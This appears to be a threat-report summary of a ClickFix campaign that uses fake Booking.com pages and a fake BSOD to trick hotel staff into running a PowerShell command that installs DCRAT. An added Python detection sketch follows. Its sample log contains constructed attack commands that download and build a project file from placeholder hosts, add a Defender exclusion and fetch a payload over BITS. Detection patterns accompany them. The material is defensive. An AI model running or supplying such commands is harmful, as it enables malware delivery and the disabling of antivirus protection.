In this new ClickFix campaign, attackers send phishing emails that impersonate a hotel guest cancelling their Booking.com reservation, typically sent to a hospitality firm.
The claimed refund amount is significant enough to create a sense of urgency for the recipient of the email.
Clicking the link in the email takes the victim to a fake Booking.com website. "The page utilizes official Booking.com branding, including the correct color palette, logos, and font styles."
The site hosts malicious JavaScript that displays a fake "Loading is taking too long" error to the target, prompting them to click a button to refresh the page.
However, when the target clicks the button, the browser instead enters full-screen mode and displays a fake Windows BSOD crash screen that initiates the ClickFix social engineering attack.
The screen instructs the person to open the Windows Run dialog box and press CTRL+V, which pastes a malicious command that the page has already placed on the Windows clipboard.
The user is then prompted to press the OK button or Enter on their keyboard to execute the command.
The pasted command launches PowerShell, which opens a decoy Booking.com admin page in the foreground while, in the background, it downloads a malicious .NET project file (v.proj) and compiles it with the legitimate Windows MSBuild.exe compiler.
When executed, the payload adds Windows Defender exclusions and triggers UAC prompts to gain admin rights, before it downloads the primary loader using the Background Intelligent Transfer Service (BITS) and establishes persistence by dropping a .url file in the Startup folder.
The malware (staxs.exe) is DCRAT, a remote access Trojan commonly used by threat actors for remote access to infected devices.
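The chain above leaves a distinctive process tree: a command launched from the Run dialog is spawned by explorer.exe, PowerShell then starts MSBuild.exe on a project file in a user-writable directory, and the compiled payload calls Add-MpPreference and BITS. The following detection sketch is an added example, not code from the article or the researchers; it runs four rules over constructed process-creation records and correlates them per host. The pipe-separated record layout, every sample line, the hostnames and the `example.invalid` URLs are assumptions made for this example, not indicators from the campaign.

```python
"""
Added example (not from the article): rule-based detection of the ClickFix
process chain described above, run over constructed process-creation records.
Record layout (an assumption for this example):
    timestamp|host|parent_image|image|command_line
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    parent: str   # full path of the parent image
    image: str    # full path of the created process image
    cmdline: str


# Constructed sample telemetry (hosts, paths and URLs are placeholders).
# WS01 shows the whole chain; WS02 is a legitimate Visual Studio build that must not fire.
SAMPLE_LOG = r"""
2025-01-15T09:41:02Z|WS01|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden -c "Start-Process 'https://admin.example.invalid/'; iwr https://cdn.example.invalid/v.proj -OutFile $env:TEMP\v.proj; & 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe' $env:TEMP\v.proj"
2025-01-15T09:41:05Z|WS01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe|MSBuild.exe C:\Users\guest\AppData\Local\Temp\v.proj
2025-01-15T09:41:09Z|WS01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "Add-MpPreference -ExclusionPath C:\Users\guest\AppData\Roaming"
2025-01-15T09:41:12Z|WS01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer job /download https://cdn.example.invalid/staxs.exe C:\Users\guest\AppData\Roaming\staxs.exe
2025-01-15T11:02:30Z|WS02|C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe|C:\Program Files\Microsoft Visual Studio\2022\MSBuild\Current\Bin\MSBuild.exe|MSBuild.exe C:\src\app\app.csproj /t:Build
""".strip()

# Directories an unprivileged user can write to (the Run-dialog command drops v.proj there).
USER_WRITABLE = re.compile(r"(\\appdata\\|\\temp\\|\\downloads\\|\\public\\|\\programdata\\)", re.I)
# Indicators of a PowerShell one-liner meant to run unseen and fetch something.
PS_SUSPICIOUS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|invoke-expression|"
    r"\biwr\b|invoke-webrequest|downloadstring|https?://)", re.I)


def parse_log(text: str) -> List[ProcEvent]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append(ProcEvent(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, parent, image, cmdline))
    return events


def _base(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_run_dialog_powershell(e: ProcEvent) -> bool:
    # Commands typed into the Run dialog are children of explorer.exe.
    return (_base(e.parent) == "explorer.exe"
            and _base(e.image) in {"powershell.exe", "pwsh.exe"}
            and PS_SUSPICIOUS.search(e.cmdline) is not None)


def rule_msbuild_user_project(e: ProcEvent) -> bool:
    # MSBuild compiling a project file that lives in a user-writable location.
    return (_base(e.image) == "msbuild.exe"
            and re.search(r"\.(proj|csproj|vbproj|xml)\b", e.cmdline, re.I) is not None
            and USER_WRITABLE.search(e.cmdline) is not None)


def rule_defender_exclusion(e: ProcEvent) -> bool:
    return re.search(r"add-mppreference.*-exclusion", e.cmdline, re.I) is not None


def rule_bits_download(e: ProcEvent) -> bool:
    return ((_base(e.image) == "bitsadmin.exe" and "/transfer" in e.cmdline.lower())
            or re.search(r"start-bitstransfer", e.cmdline, re.I) is not None)


RULES = [
    ("run_dialog_powershell", rule_run_dialog_powershell),
    ("msbuild_user_project", rule_msbuild_user_project),
    ("defender_exclusion", rule_defender_exclusion),
    ("bits_download", rule_bits_download),
]


def detect(events: List[ProcEvent]) -> List[Tuple[str, str, datetime]]:
    """Return (rule_name, host, timestamp) for every event/rule match, in log order."""
    return [(name, e.host, e.ts) for e in events for name, rule in RULES if rule(e)]


def correlate(events: List[ProcEvent], window: timedelta = timedelta(minutes=15)) -> Dict[str, List[str]]:
    """Per host, the rules that fired within `window` of a Run-dialog PowerShell launch,
    reported only when MSBuild on a user-writable project followed (the ClickFix chain)."""
    by_host: Dict[str, List[Tuple[datetime, str]]] = {}
    for name, host, ts in detect(events):
        by_host.setdefault(host, []).append((ts, name))
    chains: Dict[str, List[str]] = {}
    for host, hits in by_host.items():
        for start, name in hits:
            if name != "run_dialog_powershell":
                continue
            fired = sorted({n for ts, n in hits if start <= ts <= start + window})
            if "msbuild_user_project" in fired:
                chains[host] = fired
    return chains


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for hit in detect(evs):
        print(hit)
    print(correlate(evs))
```

The first two rules are the ones worth tuning: explorer.exe spawning a hidden PowerShell with a URL on the command line is rare on a workstation, and MSBuild building a project out of %TEMP% or %APPDATA% is rarer still, so requiring both within a short window keeps developer machines (WS02 above) quiet. The .url dropped into the Startup folder is a file-creation event, which this process-only sketch does not cover.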